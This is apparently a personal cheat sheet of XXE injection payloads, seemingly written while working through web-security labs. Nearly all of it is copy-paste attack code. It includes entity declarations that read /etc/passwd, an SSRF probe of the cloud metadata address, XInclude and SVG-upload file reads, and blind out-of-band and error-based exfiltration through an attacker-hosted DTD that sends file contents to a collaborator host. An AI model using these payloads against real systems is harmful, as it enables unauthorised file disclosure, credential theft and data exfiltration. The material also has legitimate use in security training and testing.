1)Retrieving files using XXE Injection ---> Suppose if value is given such as <productid>1</productid> 
                                     --->Use this script ---> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
                                     ---> replace the value 1 with &xxe;

2)Exploting SSRF with XXE  Injection ---> Use this Script ---> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
                                     --->Don't Forget to follow path if redirected some folder in output

3)Blind XXE Injection  ---> Use this Script ---> <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>
4)Exploting Xinclude to retrieve files ---> In the value parameter such as <productid>1</productid> ----> replace the 1 with ---> <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
4)SVG File Upload ---> Create a local SVG file ---> Replace the original content with ---> <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
5)Exploiting Blind-XXE via Error Messages in Externally Hosted Server
    --->Copy this inside script
    ----> <script> <!ENTITY % file SYSTEM "file:///etc/passwd">
                   <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
                   %eval;
                   %exfil;
          </script>
    ---> Insert this --><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> 

5)Burp-Collaborator-Type: --> <!ENTITY % file SYSTEM "file:///etc/hostname">
                               <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
                               %eval;
                               %exfil;
                          --->Store the exploit in <script> --here-- </script> and copy the link after the exploit server is ready
                          ---> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
                          --->Check For Collaborator responses !!

6)Exploting LocalDLD file type ---> Insert this script --->
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
